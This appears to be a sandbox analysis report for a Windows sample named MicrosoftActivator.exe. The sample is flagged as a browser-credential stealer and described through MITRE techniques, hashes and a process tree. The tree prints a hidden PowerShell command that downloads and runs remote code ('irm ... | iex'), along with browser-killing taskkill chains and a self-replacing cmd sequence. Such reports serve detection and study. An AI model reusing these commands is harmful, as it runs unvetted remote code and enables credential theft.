e0580491c1146ad6707ad2d81a080cb6fb545bd6b8e2dbc16e0b06e9780764eb

Resubmissions

12/03/2025, 21:37

250312-1gyvbsvrx7 10

12/03/2025, 21:23

250312-z8hrravpt3 10

Analysis

max time kernel
83s
max time network
184s
platform
windows11-21h2_x64
resource
win11-20250218-en
resource tags

arch:x64arch:x86image:win11-20250218-enlocale:en-usos:windows11-21h2-x64system
submitted
12/03/2025, 21:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MicrosoftActivator.exe
Size

130.1MB
MD5

57f71793f17ef4f6d1aad11db4b9e402
SHA1

488bbda45048d6dab83d3d725bd97c9b7f8e5987
SHA256

e0580491c1146ad6707ad2d81a080cb6fb545bd6b8e2dbc16e0b06e9780764eb
SHA512

3394f7ba35438b9bc7fad9466ec299851bb5a4a301c48c58eaabcc17e7fd7286257589157937d286359597344a6d9b3a4c26c96c1f89683a5059afd01efa6447
SSDEEP

786432:nkgh3akgh2vk49Otsbyx1DOUNoER7gHk49Otsbyx1DOUNoER7g2:kgJTgwvk49QsmPf2Hk49QsmPf22

Score

8^/10

discovery execution spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
11	1008	powershell.exe
12	1008	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1008	powershell.exe
1216	powershell.exe
2636	powershell.exe
4600	powershell.exe
3880	powershell.exe
400	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\RuntimeBroker.exe	tmpustbfl.tmp.exe

Executes dropped EXE 3 IoCs

pid	Process
2024	tmpustbfl.tmp.exe
3428	MicrosoftActivator.exe
3412	RuntimeBroker.exe

Loads dropped DLL 1 IoCs

pid	Process
3412	RuntimeBroker.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	raw.githubusercontent.com
12	raw.githubusercontent.com

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4472	sc.exe
2228	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1636	cmd.exe
3036	PING.EXE
4476	cmd.exe
4732	PING.EXE

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
1236	timeout.exe
2040	timeout.exe

Kills process with taskkill 8 IoCs

defense_evasion

pid	Process
4476	taskkill.exe
4192	taskkill.exe
4960	taskkill.exe
1804	taskkill.exe
2892	taskkill.exe
420	taskkill.exe
5012	taskkill.exe
2964	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
3036	PING.EXE
4732	PING.EXE

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
1008	powershell.exe
1008	powershell.exe
2636	powershell.exe
2636	powershell.exe
2636	powershell.exe
4600	powershell.exe
4600	powershell.exe
4600	powershell.exe
3880	powershell.exe
3880	powershell.exe
3880	powershell.exe
400	powershell.exe
400	powershell.exe
400	powershell.exe
1216	powershell.exe
1216	powershell.exe
1216	powershell.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	4600	powershell.exe
Token: SeDebugPrivilege	3880	powershell.exe
Token: SeDebugPrivilege	400	powershell.exe
Token: SeDebugPrivilege	1216	powershell.exe
Token: SeDebugPrivilege	4960	taskkill.exe
Token: SeDebugPrivilege	1804	taskkill.exe
Token: SeDebugPrivilege	2892	taskkill.exe
Token: SeDebugPrivilege	420	taskkill.exe
Token: SeDebugPrivilege	5012	taskkill.exe
Token: SeDebugPrivilege	2964	taskkill.exe
Token: SeDebugPrivilege	4476	taskkill.exe
Token: SeDebugPrivilege	4192	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1704	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 432 wrote to memory of 2024	432	MicrosoftActivator.exe	85
PID 432 wrote to memory of 2024	432	MicrosoftActivator.exe	85
PID 432 wrote to memory of 3832	432	MicrosoftActivator.exe	86
PID 432 wrote to memory of 3832	432	MicrosoftActivator.exe	86
PID 3832 wrote to memory of 1236	3832	cmd.exe	88
PID 3832 wrote to memory of 1236	3832	cmd.exe	88
PID 3832 wrote to memory of 2040	3832	cmd.exe	89
PID 3832 wrote to memory of 2040	3832	cmd.exe	89
PID 3832 wrote to memory of 3428	3832	cmd.exe	90
PID 3832 wrote to memory of 3428	3832	cmd.exe	90
PID 3428 wrote to memory of 4940	3428	MicrosoftActivator.exe	91
PID 3428 wrote to memory of 4940	3428	MicrosoftActivator.exe	91
PID 4940 wrote to memory of 1008	4940	cmd.exe	93
PID 4940 wrote to memory of 1008	4940	cmd.exe	93
PID 1008 wrote to memory of 992	1008	powershell.exe	94
PID 1008 wrote to memory of 992	1008	powershell.exe	94
PID 1008 wrote to memory of 3472	1008	powershell.exe	95
PID 1008 wrote to memory of 3472	1008	powershell.exe	95
PID 3472 wrote to memory of 4472	3472	cmd.exe	97
PID 3472 wrote to memory of 4472	3472	cmd.exe	97
PID 3472 wrote to memory of 1804	3472	cmd.exe	98
PID 3472 wrote to memory of 1804	3472	cmd.exe	98
PID 3472 wrote to memory of 1832	3472	cmd.exe	99
PID 3472 wrote to memory of 1832	3472	cmd.exe	99
PID 3472 wrote to memory of 1124	3472	cmd.exe	100
PID 3472 wrote to memory of 1124	3472	cmd.exe	100
PID 3472 wrote to memory of 1980	3472	cmd.exe	101
PID 3472 wrote to memory of 1980	3472	cmd.exe	101
PID 3472 wrote to memory of 2204	3472	cmd.exe	102
PID 3472 wrote to memory of 2204	3472	cmd.exe	102
PID 3472 wrote to memory of 1216	3472	cmd.exe	103
PID 3472 wrote to memory of 1216	3472	cmd.exe	103
PID 3472 wrote to memory of 2388	3472	cmd.exe	104
PID 3472 wrote to memory of 2388	3472	cmd.exe	104
PID 3472 wrote to memory of 2416	3472	cmd.exe	105
PID 3472 wrote to memory of 2416	3472	cmd.exe	105
PID 2416 wrote to memory of 3016	2416	cmd.exe	106
PID 2416 wrote to memory of 3016	2416	cmd.exe	106
PID 2416 wrote to memory of 2552	2416	cmd.exe	107
PID 2416 wrote to memory of 2552	2416	cmd.exe	107
PID 3472 wrote to memory of 240	3472	cmd.exe	108
PID 3472 wrote to memory of 240	3472	cmd.exe	108
PID 3472 wrote to memory of 1436	3472	cmd.exe	109
PID 3472 wrote to memory of 1436	3472	cmd.exe	109
PID 3472 wrote to memory of 808	3472	cmd.exe	110
PID 3472 wrote to memory of 808	3472	cmd.exe	110
PID 3472 wrote to memory of 2760	3472	cmd.exe	111
PID 3472 wrote to memory of 2760	3472	cmd.exe	111
PID 808 wrote to memory of 2636	808	cmd.exe	112
PID 808 wrote to memory of 2636	808	cmd.exe	112
PID 3472 wrote to memory of 2460	3472	cmd.exe	113
PID 3472 wrote to memory of 2460	3472	cmd.exe	113
PID 3472 wrote to memory of 4600	3472	cmd.exe	114
PID 3472 wrote to memory of 4600	3472	cmd.exe	114
PID 3472 wrote to memory of 4540	3472	cmd.exe	115
PID 3472 wrote to memory of 4540	3472	cmd.exe	115
PID 3472 wrote to memory of 3880	3472	cmd.exe	116
PID 3472 wrote to memory of 3880	3472	cmd.exe	116
PID 3880 wrote to memory of 4708	3880	powershell.exe	117
PID 3880 wrote to memory of 4708	3880	powershell.exe	117
PID 4708 wrote to memory of 2228	4708	cmd.exe	118
PID 4708 wrote to memory of 2228	4708	cmd.exe	118
PID 4708 wrote to memory of 4752	4708	cmd.exe	119
PID 4708 wrote to memory of 4752	4708	cmd.exe	119

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\MicrosoftActivator.exe
"C:\Users\Admin\AppData\Local\Temp\MicrosoftActivator.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:432
- C:\Users\Admin\AppData\Local\Temp\tmpustbfl.tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\tmpustbfl.tmp.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  PID:2024
- - C:\Windows\System32\drivers\RuntimeBroker.exe
    "C:\Windows\System32\drivers\RuntimeBroker.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3412
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c "taskkill /f /im chrome.exe"
      4⤵
      PID:2108
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im chrome.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4960
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c "taskkill /f /im msedge.exe"
      4⤵
      PID:1052
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im msedge.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1804
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c "taskkill /f /im AvastBrowser.exe"
      4⤵
      PID:1832
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im AvastBrowser.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2892
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c "taskkill /f /im epicbrowser.exe"
      4⤵
      PID:2172
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im epicbrowser.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:420
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c "taskkill /f /im brave.exe"
      4⤵
      PID:1420
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im brave.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5012
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c "taskkill /f /im opera.exe"
      4⤵
      PID:1616
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im opera.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2964
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c "taskkill /f /im operagx.exe"
      4⤵
      PID:1532
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im operagx.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4476
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c "taskkill /f /im vivaldi.exe"
      4⤵
      PID:808
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im vivaldi.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4192
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c timeout 5 && move "C:\Users\Admin\AppData\Local\Temp\tmp1q2qa5.tmp.exe" "C:\Users\Admin\AppData\Local\Temp\MicrosoftActivator.exe.new" && timeout 1 && del "C:\Users\Admin\AppData\Local\Temp\MicrosoftActivator.exe" && rename "C:\Users\Admin\AppData\Local\Temp\MicrosoftActivator.exe.new" "MicrosoftActivator.exe" && "MicrosoftActivator.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3832
- - C:\Windows\system32\timeout.exe
    timeout 5
    3⤵
    - Delays execution with timeout.exe
    PID:1236
- - C:\Windows\system32\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:2040
- - C:\Users\Admin\AppData\Local\Temp\MicrosoftActivator.exe
    "MicrosoftActivator.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -WindowStyle hidden -c "irm https://get.activated.win | iex"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4940
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle hidden -c "irm https://get.activated.win | iex"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1008
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo CMD is working"
        6⤵
        
        PID:992
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ""C:\Windows\Temp\MAS_6fa170f2-6b43-456a-8ca6-b44c6ea903fa.cmd" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3472
        
        C:\Windows\System32\sc.exe
        
        sc query Null
        7⤵
        Launches sc.exe
        
        PID:4472
        
        C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        7⤵
        
        PID:1804
        
        C:\Windows\System32\findstr.exe
        
        findstr /v "$" "MAS_6fa170f2-6b43-456a-8ca6-b44c6ea903fa.cmd"
        7⤵
        
        PID:1832
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c ver
        7⤵
        
        PID:1124
        
        C:\Windows\System32\reg.exe
        
        reg query "HKCU\Console" /v ForceV2
        7⤵
        
        PID:1980
        
        C:\Windows\System32\find.exe
        
        find /i "0x0"
        7⤵
        
        PID:2204
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "AMD64 " "
        7⤵
        
        PID:1216
        
        C:\Windows\System32\find.exe
        
        find /i "ARM64"
        7⤵
        
        PID:2388
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c echo prompt $E | cmd
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2416
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "
        8⤵
        
        PID:3016
        
        C:\Windows\System32\cmd.exe
        
        cmd
        8⤵
        
        PID:2552
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "C:\Windows\Temp\MAS_6fa170f2-6b43-456a-8ca6-b44c6ea903fa.cmd" "
        7⤵
        
        PID:240
        
        C:\Windows\System32\find.exe
        
        find /i "C:\Users\Admin\AppData\Local\Temp"
        7⤵
        
        PID:1436
        
        C:\Windows\System32\cmd.exe
        
        cmd /c "powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_6fa170f2-6b43-456a-8ca6-b44c6ea903fa.cmd') -split ':PStest:\s*';iex ($f[1])""
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_6fa170f2-6b43-456a-8ca6-b44c6ea903fa.cmd') -split ':PStest:\s*';iex ($f[1])"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2636
        
        C:\Windows\System32\find.exe
        
        find /i "FullLanguage"
        7⤵
        
        PID:2760
        
        C:\Windows\System32\fltMC.exe
        
        fltmc
        7⤵
        
        PID:2460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('GetConsoleWindow', 'kernel32.dll', 22, 1, [IntPtr], @(), 1, 3).SetImplementationFlags(128); [void]$TB.DefinePInvokeMethod('SendMessageW', 'user32.dll', 22, 1, [IntPtr], @([IntPtr], [UInt32], [IntPtr], [IntPtr]), 1, 3).SetImplementationFlags(128); $hIcon = $TB.CreateType(); $hWnd = $hIcon::GetConsoleWindow(); echo $($hIcon::SendMessageW($hWnd, 127, 0, 0) -ne [IntPtr]::Zero);"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4600
        
        C:\Windows\System32\find.exe
        
        find /i "True"
        7⤵
        
        PID:4540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$t=[AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); $t.DefinePInvokeMethod('GetStdHandle', 'kernel32.dll', 22, 1, [IntPtr], @([Int32]), 1, 3).SetImplementationFlags(128); $t.DefinePInvokeMethod('SetConsoleMode', 'kernel32.dll', 22, 1, [Boolean], @([IntPtr], [Int32]), 1, 3).SetImplementationFlags(128); $k=$t.CreateType(); $b=$k::SetConsoleMode($k::GetStdHandle(-10), 0x0080); & cmd.exe '/c' '"""C:\Windows\Temp\MAS_6fa170f2-6b43-456a-8ca6-b44c6ea903fa.cmd""" -el -qedit'"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3880
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""C:\Windows\Temp\MAS_6fa170f2-6b43-456a-8ca6-b44c6ea903fa.cmd" -el -qedit"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4708
        
        C:\Windows\System32\sc.exe
        
        sc query Null
        9⤵
        Launches sc.exe
        
        PID:2228
        
        C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        9⤵
        
        PID:4752
        
        C:\Windows\System32\findstr.exe
        
        findstr /v "$" "MAS_6fa170f2-6b43-456a-8ca6-b44c6ea903fa.cmd"
        9⤵
        
        PID:1100
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "
        9⤵
        
        PID:4828
        
        C:\Windows\System32\find.exe
        
        find /i "/"
        9⤵
        
        PID:2968
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c ver
        9⤵
        
        PID:3884
        
        C:\Windows\System32\reg.exe
        
        reg query "HKCU\Console" /v ForceV2
        9⤵
        
        PID:4820
        
        C:\Windows\System32\find.exe
        
        find /i "0x0"
        9⤵
        
        PID:1692
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "AMD64 " "
        9⤵
        
        PID:812
        
        C:\Windows\System32\find.exe
        
        find /i "ARM64"
        9⤵
        
        PID:4212
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c echo prompt $E | cmd
        9⤵
        
        PID:3432
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "
        10⤵
        
        PID:392
        
        C:\Windows\System32\cmd.exe
        
        cmd
        10⤵
        
        PID:2404
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "C:\Windows\Temp\MAS_6fa170f2-6b43-456a-8ca6-b44c6ea903fa.cmd" "
        9⤵
        
        PID:3440
        
        C:\Windows\System32\find.exe
        
        find /i "C:\Users\Admin\AppData\Local\Temp"
        9⤵
        
        PID:1964
        
        C:\Windows\System32\cmd.exe
        
        cmd /c "powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_6fa170f2-6b43-456a-8ca6-b44c6ea903fa.cmd') -split ':PStest:\s*';iex ($f[1])""
        9⤵
        
        PID:5028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_6fa170f2-6b43-456a-8ca6-b44c6ea903fa.cmd') -split ':PStest:\s*';iex ($f[1])"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:400
        
        C:\Windows\System32\find.exe
        
        find /i "FullLanguage"
        9⤵
        
        PID:3744
        
        C:\Windows\System32\fltMC.exe
        
        fltmc
        9⤵
        
        PID:4168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('GetConsoleWindow', 'kernel32.dll', 22, 1, [IntPtr], @(), 1, 3).SetImplementationFlags(128); [void]$TB.DefinePInvokeMethod('SendMessageW', 'user32.dll', 22, 1, [IntPtr], @([IntPtr], [UInt32], [IntPtr], [IntPtr]), 1, 3).SetImplementationFlags(128); $hIcon = $TB.CreateType(); $hWnd = $hIcon::GetConsoleWindow(); echo $($hIcon::SendMessageW($hWnd, 127, 0, 0) -ne [IntPtr]::Zero);"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1216
        
        C:\Windows\System32\find.exe
        
        find /i "True"
        9⤵
        
        PID:2964
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c ping -4 -n 1 activated.win
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1636
        
        C:\Windows\System32\PING.EXE
        
        ping -4 -n 1 activated.win
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3036
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c ping -4 -n 1 updatecheck30.activated.win
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4476
        
        C:\Windows\System32\PING.EXE
        
        ping -4 -n 1 updatecheck30.activated.win
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4732
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "
        9⤵
        
        PID:808
        
        C:\Windows\System32\find.exe
        
        find /i "/S"
        9⤵
        
        PID:2344
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "
        9⤵
        
        PID:2560
        
        C:\Windows\System32\find.exe
        
        find /i "/"
        9⤵
        
        PID:4192
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop
        9⤵
        
        PID:5112
        
        C:\Windows\System32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop
        10⤵
        
        PID:4464
        
        C:\Windows\System32\mode.com
        
        mode 76, 34
        9⤵
        
        PID:3200
        
        C:\Windows\System32\choice.exe
        
        choice /C:123456789EH0 /N
        9⤵
        
        PID:4180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=4412,i,15097001321230888692,16543789583043501740,262144 --variations-seed-version --mojo-platform-channel-handle=4432 /prefetch:14
1⤵
PID:3060

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:2708

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e76a373eb633593cc1087ece0b406619

SHA1
46955a67a171bebf435160d5f015211f0524956e

SHA256
8d6c910f06d8efd901a564a9d022b3b0aaa522424ab20338fb113bf4efca280f

SHA512
1f977f6384faa37d711283551f269bbb799c0940f5d5550f7e48fd4adf088efac32fbf507323bafa77331542eeb44acb862a2ba13177d6ea1ef1ce4e796a4cf1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b234153fc2a7b5d33613b1c41ab301b3

SHA1
5d89d3e8b9fbde6fce5c779201b2cb08563b6628

SHA256
7a94a4795be255b29149cb4311ab10792705edfcc47834c6cf5c939bfb76af45

SHA512
e09134123f8013448aee6d4828a88841b223f32c86df57a077bfc0c204c3c891b63de6bf469b3b7ae7ab3bc6ffe6c0736655393b6c7ec3bdc5cb87adc4b78095

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8a9ce637f47cb4acdbef782b0c075292

SHA1
61c4f0209f159fae19220a78c4428848c90d0e01

SHA256
fd949ff64bc93b6bcff447de4f7307dbd4cfb391faf81efe2a845f8349d9b10c

SHA512
6452ea5fff0d3139dd61de41cb37738a228bd13f7b039aa519acb8ab5f2084c10473415f0d3631a68829e81da3dc6018e37cff3618c48ae358c9a94fa91eb122

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\bbb043c8-3d9c-48d5-abdf-738eafe06340.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
23KB

MD5
fd170f4bceb2a88dca09f9f5cd78f8b4

SHA1
6b0d817d720fe518e18c3a3e567534226d194a5a

SHA256
5fb7394a5cfaeffb0f4e78e0c0c90884babf86245644bf828a65d2a22a286801

SHA512
465c4a6f6babce458d94bc0ea17511c334936ccf4badda7beff267ad3a01fc2f798baf09afc170bf54c85e603244c19fccab41f0ff039e85bdf1927aea25d14f

Download Submit
C:\Users\Admin\AppData\Local\Temp\SQLite.Interop.dll

Filesize
1.9MB

MD5
4930777866b1fdaed2ab80b0fb8793b6

SHA1
e2686b9ac7c3867c644902805142f1f42bae7645

SHA256
1111916dc329a13bd627b2cd90c9b2263de9923fd0bb6059c69c52332f360c37

SHA512
